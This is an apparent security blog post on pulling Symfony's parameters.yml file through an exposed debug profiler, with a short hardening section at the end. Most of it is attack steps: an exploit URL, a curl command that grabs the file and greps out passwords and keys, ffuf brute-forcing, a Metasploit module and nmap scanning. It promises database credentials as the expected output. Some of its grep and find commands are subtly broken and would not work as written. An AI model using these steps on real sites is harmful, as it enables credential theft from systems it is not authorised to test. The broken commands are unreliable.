Listen to this Post
Web frameworks often contain hidden paths that can expose sensitive configuration files. One such example is the Symfony PHP framework, where appending `/app_dev.php/_profiler/open?file=app/config/parameters.yml` to the target URL may reveal database credentials, API keys, and other critical data.
You Should Know:
1. Manual Testing:
- Navigate to:
http://target-site.com/app_dev.php/_profiler/open?file=app/config/parameters.yml
- If the Symfony profiler is enabled, this may return the `parameters.yml` file.
2. Automated Scanning with Curl:
curl -s "http://target-site.com/app_dev.php/_profiler/open?file=app/config/parameters.yml" | grep -E "database_password|secret|key"
3. Using FFUF for Bruteforcing:
ffuf -w /path/to/wordlist.txt -u "http://target-site.com/FUZZ" -mr "parameters.yml"
(Add the path to your wordlist)
4. Exploiting with Metasploit:
- Use the `auxiliary/scanner/http/symfony_debug_rce` module if debug mode is enabled.
5. Securing Symfony Applications:
- Disable `app_dev.php` in production.
- Restrict access to `/_profiler/` paths.
- Use environment variables instead of hardcoding secrets in
parameters.yml.
Additional Commands for Security Testing:
- Check for Open Debug Mode:
nmap -p 80,443 --script http-symfony-debug <target-IP>
- Extract Secrets from Exposed Configs:
grep -r "password|secret" /var/www/html/
- Linux File Permission Check:
find /var/www/ -type f -name ".yml" -perm -o+r -ls
What Undercode Say:
Exposed configuration files in web frameworks remain a common attack vector. Always verify debug modes, restrict sensitive paths, and encrypt secrets. For defenders, automated scanning for such misconfigurations should be part of routine security audits.
Expected Output:
- Database credentials, API keys, or encryption secrets from
parameters.yml. - A 200 OK response confirming file access.
Relevant URLs:
References:
Reported By: Zlatanh If – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
